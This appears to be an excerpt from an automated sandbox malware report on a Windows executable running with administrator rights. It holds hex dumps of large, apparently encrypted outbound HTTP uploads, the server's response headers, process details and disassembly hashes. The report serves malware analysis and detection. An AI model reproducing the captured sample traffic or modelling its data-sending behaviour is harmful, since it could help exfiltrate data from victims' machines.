                                                                                                              2024-12-20 15:56:03 UTC15331OUTData Raw: 43 44 b2 ce 38 b2 ba a6 ef 38 9e 9d 1c 3a 36 8f a4 c9 ea 8d cb a6 2f b0 e0 2b 8d 66 08 dc 1c c2 fd df 2b 81 54 df f1 61 ac a8 ca 89 7b fe 43 d2 f4 3c 80 3a ce ed ac 87 7f ce c8 f8 08 14 ef d9 80 0d 6d 5c 98 cf 56 d1 62 d5 68 e5 2f 23 4d e7 b9 5a 34 c5 88 e0 78 1d 5a 19 a4 9d e3 0e 65 34 71 db dc 3d 05 af be c1 f7 31 0c 36 12 e7 ea 0d 66 37 2a c5 56 55 26 0d 2b 06 cd 1d 1f ac 38 cc 9a 92 99 19 58 58 7a 49 6b f2 dd 22 f0 db 41 33 c6 05 09 81 89 1e 34 7b 43 77 30 58 ed 50 68 91 92 1d 44 1e fe 34 f0 3d b9 79 73 d8 c4 ed 05 ef dc 6a c0 f9 46 59 ea 0b 2a c5 13 fd 7a 8b 26 d4 d8 53 34 34 da 26 91 d0 15 ca 94 5d 3a cd ce a4 69 86 74 86 12 f8 e3 7a 98 69 55 ee 93 8a 8d 56 c0 c5 f3 02 49 63 47 94 f9 57 96 92 e9 89 07 c0 04 78 69 9e 84 24 79 78 97 b8 9c 7f fa 61 80
                                                                                                              Data Ascii: CD88:6/+f+Ta{C<:m\Vbh/#MZ4xZe4q=16f7*VU&+8XXzIk"A34{Cw0XPhD4=ysjFY*z&S44&]:itziUVIcGWxi$yxa
                                                                                                              2024-12-20 15:56:03 UTC15331OUTData Raw: e9 8f e9 a4 ad 75 a1 3b 39 bf d2 c2 57 48 c3 f5 a8 d1 4b c0 fa 2e 15 3f 8d 5f 92 fd 5d 44 3c e9 ec 30 ad 3c a4 f2 d4 96 9a 05 27 0e de 65 dd f7 a6 a9 a3 6a 8c 63 fc ae f8 f0 f0 a3 97 f2 9a 75 40 af 5c a4 fc fc d9 2c 37 d5 ea 2b b3 e6 4c 93 da ea 2f 4f 74 af a2 cc 4a 10 df ea 4c 72 a9 9a 5c 78 12 99 ae 9e c8 bb 49 ea 83 bf d8 ce b2 2d 3d f9 57 be e0 54 32 d2 d6 2c 3f 92 3b 26 9d 4a 0d df 87 75 57 66 fa f7 6f 5c d3 40 6d 53 3b bd b5 81 1f fa c9 7d c2 51 77 df 71 8d 8a 89 ce 89 78 dd 81 94 cd 69 57 ca 51 c6 f2 14 e3 f8 5c e5 8d 73 65 6e 5f 3e 24 40 2c d1 8f 9b 5b 2b 3d 46 7f 4e 94 1e d8 67 65 6d b2 76 99 b0 59 c5 19 5e 6c d3 70 62 c5 b1 7f 8a fd e5 b0 61 7a b2 b3 82 24 33 f7 11 15 12 57 5a 0c 05 1d 49 fc 15 b2 52 ea 13 b4 be e2 23 a3 cd 1a 14 76 5d db 45 1f
                                                                                                              Data Ascii: u;9WHK.?_]D<0<'ejcu@\,7+L/OtJLr\xI-=WT2,?;&JuWfo\@mS;}QwqxiWQ\sen_>$@,[+=FNgemvY^lpbaz$3WZIR#v]E
                                                                                                              2024-12-20 15:56:03 UTC15331OUTData Raw: 97 b1 60 0a d5 61 e3 d9 b1 59 cf 72 a7 3b 2a cb 67 e3 f2 b2 89 91 e7 1c 75 21 a9 cd 7d 60 ec 11 1d c6 4f 81 fc 73 2b 24 dd 5b 43 7f d8 da 79 5d e7 2b ef bb ca 7a 39 0c 79 3f 90 d8 b8 1b 47 4f f8 f4 98 64 d0 b5 49 39 1a 4d ab a8 47 d0 ff 0a 7a 89 bf fe 98 70 ef 0f c0 b9 b6 32 e6 79 cb b9 fc ec 12 3f b4 ed cf 9e 37 ce 19 b6 e9 bb 11 96 c0 79 b9 4f d2 ec 38 7a b4 e1 4b d8 f4 56 01 0e 97 88 b3 30 a2 13 ec fa 33 72 e8 97 e7 0d 73 56 a4 be 36 ef 79 dc fd 88 78 55 84 eb d7 52 bd 14 5c 51 33 f8 f6 1e ab b7 7c 55 21 be 2e b4 7c 74 dd 75 e3 44 6f d8 44 94 0e d5 0d b1 1f bb 5a 00 9d fd 12 5d ba d9 db b4 73 61 82 56 17 21 c3 4f 5f a9 f6 95 15 b8 c9 32 30 af b5 af fe b8 b0 f1 5f e1 9c 7d 6e d8 2d 6f 1e 86 80 15 ae 99 a8 cb ec 80 24 5f 28 99 b7 d6 97 fb ed c7 d3 5e 9a
                                                                                                              Data Ascii: `aYr;*gu!}`Os+$[Cy]+z9y?GOdI9MGzp2y?7yO8zKV03rsV6yxUR\Q3|U!.|tuDoDZ]saV!O_20_}n-o$_(^
                                                                                                              2024-12-20 15:56:03 UTC15331OUTData Raw: 8e 3c d4 2c 45 9b e4 10 1a 9a 11 d7 f7 4a 5a 57 57 6f 99 75 ea 7a 35 35 4b f9 6c 8c 2c b6 23 70 be 9b 47 97 7f fe 12 0c 27 3a 14 b4 39 55 b4 b8 e4 c5 09 ad 4c 34 1b 1e a8 20 68 70 69 90 73 fd 37 e2 da 9d 19 3e a6 7c d4 66 db 89 f9 09 fc 60 30 17 43 fe 87 41 e7 d7 89 2b 0a 57 26 3a 3d dd 53 1e 1e 5c d8 b9 43 d0 49 42 87 a3 42 a4 f9 fd 58 99 75 1c 3e 4b bb f4 07 dc 48 20 2c 8e 58 14 da 2a 12 a3 24 4b aa e7 ae 09 0e be 68 44 9f 69 19 f9 b1 63 f5 44 1d d5 6d 66 53 7f 4d 10 1d 50 b4 31 f0 67 9e 1b 33 85 ab 35 60 e0 43 4d e7 90 fe 7a 31 e6 01 e6 66 8a 4e 19 c5 90 eb 6c 57 f3 46 81 80 91 ef ce 3b 38 d1 48 4f e5 37 27 a7 ab ac 33 1a 89 cd d0 5e c9 8e 86 f9 59 66 10 d5 a7 e4 76 7f 52 62 02 fc c0 a0 22 e0 07 6e 44 b0 42 eb f0 d9 ea 13 f2 b3 9d e7 e9 66 0c f1 db bf
                                                                                                              Data Ascii: <,EJZWWouz55Kl,#pG':9UL4 hpis7>|f`0CA+W&:=S\CIBBXu>KH ,X*$KhDicDmfSMP1g35`CMz1fNlWF;8HO7'3^YfvRb"nDBf
                                                                                                              2024-12-20 15:56:03 UTC15331OUTData Raw: a0 8f 31 24 14 46 19 1e 1f 7a d9 43 71 02 01 ee 17 1d f3 73 1d 2e 54 8c 39 77 03 f5 ec b2 15 77 02 a1 43 79 56 26 ea d4 2d b7 92 8a e5 c4 17 72 dd f6 21 b5 b7 d6 dd 17 0a c5 1e 68 7f 53 c7 dd dd 1d 86 bb c4 5e fe 12 26 2f 3e ff d7 58 ac c9 a0 df 6d 1d 8e df db ff c6 b0 9e 98 f7 03 9f 34 ac db 61 50 f7 5a 66 70 7d f7 80 a6 35 56 fb 02 20 1d 44 e8 3f 05 a4 1e ff d9 cd f1 8d 4f 3c 21 05 eb e5 d6 e5 b3 05 ef 97 06 ac a3 11 40 6c 7a 4d 58 aa f9 64 d8 9b bd af 65 80 39 5c a2 e0 ec 3e f7 23 fd c6 7b ca ce a9 cc 5e 05 7f 0c 10 1b f3 5d b1 90 c2 f2 41 44 74 68 51 ae fe e8 75 25 38 46 3d f0 09 ad 2d 08 6c 19 66 0d d6 97 17 8d f2 c8 03 21 a5 57 51 dc 7a a9 6b 12 0f 51 5f d3 57 9e d7 f7 e1 e1 e0 7e 9a eb e2 01 5a 29 24 34 c3 6f 64 28 c3 e1 0f 33 d6 42 aa 73 05 88 cf
                                                                                                              Data Ascii: 1$FzCqs.T9wwCyV&-r!hS^&/>Xm4aPZfp}5V D?O<!@lzMXde9\>#{^]ADthQu%8F=-lf!WQzkQ_W~Z)$4od(3Bs
                                                                                                              2024-12-20 15:56:03 UTC15331OUTData Raw: 68 9d 9b d3 47 52 bc 01 0e 2e 40 1a 30 24 3b 0a b9 1a bb 36 d1 10 82 d5 f8 a1 00 13 61 31 89 b7 76 4b f6 55 73 ff 65 1c 3f 71 b4 51 5c ea b9 64 8e 7a 9d 04 df 04 44 23 1d d1 c7 80 89 56 be 16 e4 dd c8 b0 3b ea b4 d2 43 e5 77 96 75 27 bf 64 1d 68 6f 63 15 91 6e 1e 89 9f af fc 11 6a 50 a8 b9 1b 0d c7 21 f5 50 eb 22 4c 11 ac 79 fc 4a d9 65 47 6a 8f 78 0e 39 a1 ed 4f 4d dd 0a 84 f6 f5 17 bc c9 30 11 26 00 d3 b9 59 c3 49 ec 56 e8 b3 6d 2b 9a c7 30 3c c3 77 96 84 b5 9d f2 58 fe 2f 8f 50 5f 6b 30 e9 23 d8 74 bb 67 24 5a 1b e7 12 e9 28 81 b8 36 12 ad 8b 08 ee cb f8 37 8c 48 46 b5 b1 fb af ee 6b 63 17 bd c6 ab 55 22 c4 65 94 0d 87 f4 bd 53 91 b7 80 7f 39 a2 03 c2 9a 47 06 f4 7f f3 82 84 5a b1 af ec 0a d3 da d8 11 40 66 b9 e8 7a f2 7d 8c 54 4c bf 8f c0 a0 cc a1 cb
                                                                                                              Data Ascii: hGR.@0$;6a1vKUse?qQ\dzD#V;Cwu'dhocnjP!P"LyJeGjx9OM0&YIVm+0<wX/P_k0#tg$Z(67HFkcU"eS9GZ@fz}TL
                                                                                                              2024-12-20 15:56:03 UTC15331OUTData Raw: 77 58 6b c5 27 01 64 d5 eb d5 d3 a7 7d 9b 02 ee dc ec 2c af 62 d0 8b 1d c9 9d 89 b1 a2 71 c8 da 0b 44 03 62 61 d9 cb 0b 9b 7d c7 44 2c 3b 8c 8e 56 79 6f 4d d6 2c 4a 0a 36 05 69 96 88 d8 eb 6c b1 0d e9 88 4f e3 a5 a3 d5 7a 61 ba 9c 79 fb bf ec 0e d5 dc 4f e7 5e 45 17 fd f5 35 48 e8 ef 5a ce bc a0 92 c2 02 6e 5f 9f c4 e5 62 e5 60 75 d6 c2 d1 b6 97 a7 cb e7 17 9b 38 27 96 db 09 9a 6c 85 a5 a2 9f e9 9b db 96 11 9a 7c 66 1d 6c d9 e7 a1 8b 1a 61 1a 83 e1 c2 cc ab a7 c5 44 c7 3a a6 e9 09 9e 57 84 de 37 ba de 74 ea 13 da b9 7d 06 f4 33 d7 57 fe b7 e4 41 5e 3e ec 6c fb 07 ba 8f 10 31 60 fb dc fc 3e 5b 55 c7 73 47 f8 b3 03 ed 67 d7 36 f3 4e e0 fc 90 4a 6d 02 e3 43 b4 4e 2c ea 44 91 c0 d1 97 d6 07 77 f1 ae 20 f5 04 85 a0 2a 0b 8a 3a 2a a5 00 68 05 f3 68 d0 6e 9a 7c
                                                                                                              Data Ascii: wXk'd},bqDba}D,;VyoM,J6ilOzayO^E5HZn_b`u8'l|flaD:W7t}3WA^>l1`>[UsGg6NJmCN,Dw *:*hhn|
                                                                                                              2024-12-20 15:56:03 UTC15331OUTData Raw: d6 87 f0 b3 d7 a2 6d 12 a3 09 5d f2 87 bc c8 33 a9 7c 69 72 5a 31 34 d5 43 dc 8d f0 54 f3 1a e0 d5 1a 34 f9 09 11 8e df 5b e6 d5 fd ee 5b f8 ce 5c 8b c4 ae b7 0a c7 8e f9 82 44 a6 a4 1f 38 25 7b b4 d6 dc 02 ae 08 74 bb 4f 52 ef 09 dd fb 26 a6 a6 b2 ad 7c 37 ff 3a cf fd 27 81 3b 25 0d 54 e7 9b 62 d1 2d 4a d9 d1 f8 07 6c 8b b3 3a 49 5f d4 82 da 6a 24 04 64 9e 9c b5 e3 4c 8f 5f 1d 81 fe e6 1e 91 73 2f 00 ff 82 f4 92 0a 8c 5b 18 14 d3 aa fe fa b9 1d fd 60 f8 0a f8 71 e9 f7 ea 33 b3 cb 8e c0 e8 18 2c 19 12 4f ef dd 39 64 80 e4 a0 23 2b a7 56 4f fd 6c 40 32 ca c4 b1 1c 5a 40 e7 d5 94 c5 1e 92 b2 22 b0 af cd 65 d8 cf 56 bf b1 bd 1b d2 7a e3 89 4a c7 51 7a 06 ae 39 bf 78 b0 f3 57 91 c2 09 a8 7a ed 83 d7 cd 56 3f 83 4c 1d d9 69 1b e9 4d 17 2a 28 7e d1 98 30 ed 12
                                                                                                              Data Ascii: m]3|irZ14CT4[[\D8%{tOR&|7:';%Tb-Jl:I_j$dL_s/[`q3,O9d#+VOl@2Z@"eVzJQz9xWzV?LiM*(~0
                                                                                                              2024-12-20 15:56:03 UTC15331OUTData Raw: e6 75 2d 3c 8b a4 ce bc a3 6f b7 25 78 a4 55 65 fd f4 68 c0 f6 8c ac 1b bd 9e 1b 52 7a f1 ac 80 cd 2b da a6 7b 28 49 90 b6 7f 37 44 79 7f 76 a6 e1 67 8b d0 8a 06 c0 90 f7 fd 02 d9 e2 fb a9 70 ff 65 8f aa 74 6b ab 7d b0 1f 09 d7 74 91 bb 17 a9 4f 20 f4 86 4d 0a 6d 44 1d 77 fc ea f5 09 93 51 df 49 35 1d 6a 92 a7 8d 87 12 67 e7 75 7a 23 e2 84 5c b0 17 35 19 71 ac 9d 83 39 d7 dc 45 d7 28 f6 4d 47 95 a1 cd 0d 9e ad 49 5f f0 ce 9e 3d ed 79 f3 d3 0c 09 52 ca fa cf f6 7b fe b3 7e f9 37 66 5f f2 87 7b 9c f8 73 8d 61 b5 36 8c 16 5e aa 9f 9d 28 76 bc 6a 86 c6 ec e7 61 a8 eb fd 29 2e eb 59 b3 2f fd ee 28 c1 d4 80 c1 07 be 23 cf e6 fc 88 ab 44 ea 9c ae 2b 1b e6 74 d6 60 7a 9b 2a 29 5f 0c da a8 0b b7 cc 7a 46 6c f9 95 21 dc 2c 8c 59 a0 4b 8a 68 90 6d 8a 78 32 cc 74 47
                                                                                                              Data Ascii: u-<o%xUehRz+{(I7Dyvgpetk}tO MmDwQI5jguz#\5q9E(MGI_=yR{~7f_{sa6^(vja).Y/(#D+t`z*)_zFl!,YKhmx2tG
                                                                                                              2024-12-20 15:56:06 UTC1135INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 20 Dec 2024 15:56:06 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=feekg0heu65r95ujvrhkoojhrk; expires=Tue, 15 Apr 2025 09:42:45 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sH91xF5abTBMuTyaaRbP0FRQFmOSOkp76kyq%2FJcJArhQosKncHPNezc7Y1oMQKj9n5tLGNOoH6CPZrQy%2F7etFAoy26uDrQln5X9FPoJzOroMc6mspug4ZQPME%2BTLVz%2FSng%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f50d1f81da943e0-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2217&min_rtt=2211&rtt_var=841&sent=284&recv=574&lost=0&retrans=0&sent_bytes=2832&recv_bytes=555359&delivery_rate=1292035&cwnd=247&unsent_bytes=0&cid=07fd9046f1bbcb00&ts=3900&x=0"


                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Target ID:1
                                                                                                              Start time:10:55:39
                                                                                                              Start date:20/12/2024
                                                                                                              Path:C:\Users\user\Desktop\NAliwxUTJ4.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\NAliwxUTJ4.exe"
                                                                                                              Imagebase:0x3e0000
                                                                                                              File size:1'861'120 bytes
                                                                                                              MD5 hash:0A678F4E43E83079C1E95517F576A88D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Disassembly

                                                                                                              Reset < >

                                                                                                                Non-executed Functions

                                                                                                                Function 00E82BE6 Relevance: 7.8, Strings: 6, Instructions: 288COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000003.2647921088.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, Offset: 00E75000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_3_e75000_NAliwxUTJ4.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .$0-$;x%$@,$`-$H"
                                                                                                                • API String ID: 0-1355568199
                                                                                                                • Opcode ID: a1fc0b0b77af3aebf1dd86a12d2fd88da11744ac4fb599e95ced1ae732044df3
                                                                                                                • Instruction ID: db26e7b96543921c1dd88833e836b67da86f537d47edac402c1171ae71d6030c
                                                                                                                • Opcode Fuzzy Hash: a1fc0b0b77af3aebf1dd86a12d2fd88da11744ac4fb599e95ced1ae732044df3
                                                                                                                • Instruction Fuzzy Hash: FDC1BB8695E3C21ED313A7B45C786A43FB15F13158B5E46EBC0D8DA0E3DA8E584AD323
                                                                                                                Function 00E808E7 Relevance: 2.6, Strings: 2, Instructions: 138COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000003.2647921088.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, Offset: 00E75000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_3_e75000_NAliwxUTJ4.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ":44$bloc
                                                                                                                • API String ID: 0-1337587270
                                                                                                                • Opcode ID: d8d2ac1b9d9d24d1c729317b39c7e458b235a9acad4f4b2fbd250d4102e1d376
                                                                                                                • Instruction ID: 8c3bc4cc9770b3468a5c25477bf25ad0f3091e1e7e7203f680be2e438b3ddf95
                                                                                                                • Opcode Fuzzy Hash: d8d2ac1b9d9d24d1c729317b39c7e458b235a9acad4f4b2fbd250d4102e1d376
                                                                                                                • Instruction Fuzzy Hash: 4241BD3251D7C55DD79AEBB481A92A27FA0FFA332472C25CEC0CD2B863E211941EC748
                                                                                                                Function 00E5A364 Relevance: 2.0, Strings: 1, Instructions: 769COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000003.2647921088.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, Offset: 00E58000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_3_e58000_NAliwxUTJ4.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: )^h
                                                                                                                • API String ID: 0-1147032875
                                                                                                                • Opcode ID: 0e3ff5b6e6d4e424808838d857df2ad1cf791246bb7be01842f770e4b91a9548
                                                                                                                • Instruction ID: 39495d694f01760551deb4bd1b4b9e28fbfa5ca80745b364658fc6aa61d2bf04
                                                                                                                • Opcode Fuzzy Hash: 0e3ff5b6e6d4e424808838d857df2ad1cf791246bb7be01842f770e4b91a9548
                                                                                                                • Instruction Fuzzy Hash: 4942A0B181D7C69FF702967418D8685BFB19B13359B291AFBC8C1EB0A3E3148646C362
                                                                                                                Function 00E5A364 Relevance: 2.0, Strings: 1, Instructions: 769COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000003.2647921088.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, Offset: 00E5A000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_3_e58000_NAliwxUTJ4.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: )^h
                                                                                                                • API String ID: 0-1147032875
                                                                                                                • Opcode ID: 0e3ff5b6e6d4e424808838d857df2ad1cf791246bb7be01842f770e4b91a9548
                                                                                                                • Instruction ID: 39495d694f01760551deb4bd1b4b9e28fbfa5ca80745b364658fc6aa61d2bf04
                                                                                                                • Opcode Fuzzy Hash: 0e3ff5b6e6d4e424808838d857df2ad1cf791246bb7be01842f770e4b91a9548
                                                                                                                • Instruction Fuzzy Hash: 4942A0B181D7C69FF702967418D8685BFB19B13359B291AFBC8C1EB0A3E3148646C362
                                                                                                                Function 00EE1410 Relevance: 1.1, Instructions: 1093COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000003.2669781908.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, Offset: 00EDA000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_3_eda000_NAliwxUTJ4.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6a3f836b9eaeb8964150f0a64d363e6c513126085eaaca8e3a2e76cfd5b6c937
                                                                                                                • Instruction ID: a9721aba7118c4fc7f6786fb63cda5af2a61a07ed8105739068e03f3c1f1affc
                                                                                                                • Opcode Fuzzy Hash: 6a3f836b9eaeb8964150f0a64d363e6c513126085eaaca8e3a2e76cfd5b6c937
                                                                                                                • Instruction Fuzzy Hash: 74721F6244E3C64FC7178B71497A590BF706E23224B5E96CFC4C58F8E3E259888AC367
                                                                                                                Function 00E822C7 Relevance: .2, Instructions: 155COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000003.2647921088.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, Offset: 00E75000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_3_e75000_NAliwxUTJ4.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c84f7aa25e8cebeed0fa16b2ae521698afa88283e0ac09f9fda8985300c60867
                                                                                                                • Instruction ID: e48ebd843a1bd40cc001172bbc3563832193599e51137cfc2240a6c4c505b769
                                                                                                                • Opcode Fuzzy Hash: c84f7aa25e8cebeed0fa16b2ae521698afa88283e0ac09f9fda8985300c60867
                                                                                                                • Instruction Fuzzy Hash: 4741552240E7C09FC7239F7498A11C63FB2AE9776472988DEC4C49F527D21A9C4AC752
                                                                                                                Function 00E8228E Relevance: .1, Instructions: 88COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000003.2647921088.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, Offset: 00E75000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_3_e75000_NAliwxUTJ4.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8b24ec281873bdc0b8fb0389bdd696473a390b62a21ae8f5e2eaf0a5c54df7eb
                                                                                                                • Instruction ID: ab3d2e30e251477bc027628273be85c111ee16d656010ea390655cb2324b7e02
                                                                                                                • Opcode Fuzzy Hash: 8b24ec281873bdc0b8fb0389bdd696473a390b62a21ae8f5e2eaf0a5c54df7eb
                                                                                                                • Instruction Fuzzy Hash: 3E2185314092D18BC7236B7490602C23FB2FF9A75871994EEC8C4AF427C266984AC752
                                                                                                                Function 00ECE0BF Relevance: 6.7, Strings: 5, Instructions: 418COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000003.2648239743.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, Offset: 00EC7000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_3_ec1000_NAliwxUTJ4.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: C:\P$C:\P$\Use$\\EN$x86
                                                                                                                • API String ID: 0-1145726
                                                                                                                • Opcode ID: 9f7f2f5a29661defa530b350933596cad0d6ada113853973d5ebeb42de8bbcb5
                                                                                                                • Instruction ID: d78e9d1d9811fd236cfc3e3bbe5d0e6a7b6bbf1b735e99046cefbaa065867297
                                                                                                                • Opcode Fuzzy Hash: 9f7f2f5a29661defa530b350933596cad0d6ada113853973d5ebeb42de8bbcb5
                                                                                                                • Instruction Fuzzy Hash: CBD1639244E7C11FD70387754E7AAA17FB5AD6326430E86DFC0D18B9A3E64E490BC362
                                                                                                                Function 00ECE130 Relevance: 6.6, Strings: 5, Instructions: 309COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000003.2648239743.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, Offset: 00EC7000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_3_ec1000_NAliwxUTJ4.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: C:\P$C:\P$\Use$\\EN$x86
                                                                                                                • API String ID: 0-1145726
                                                                                                                • Opcode ID: 0e82a21e3336b1c7302db0cb0a0b1461e7f574e22ee638b405a0d47ba8b77bbe
                                                                                                                • Instruction ID: ed6302b10a68f8053bba32f48e4d3031309af5a1f1f10aa4293a634d7e361856
                                                                                                                • Opcode Fuzzy Hash: 0e82a21e3336b1c7302db0cb0a0b1461e7f574e22ee638b405a0d47ba8b77bbe
                                                                                                                • Instruction Fuzzy Hash: 3AA1769144E7C11FD70387754D6AAA07F78EE6326430E86DFD4D28B9A3E64E480BC362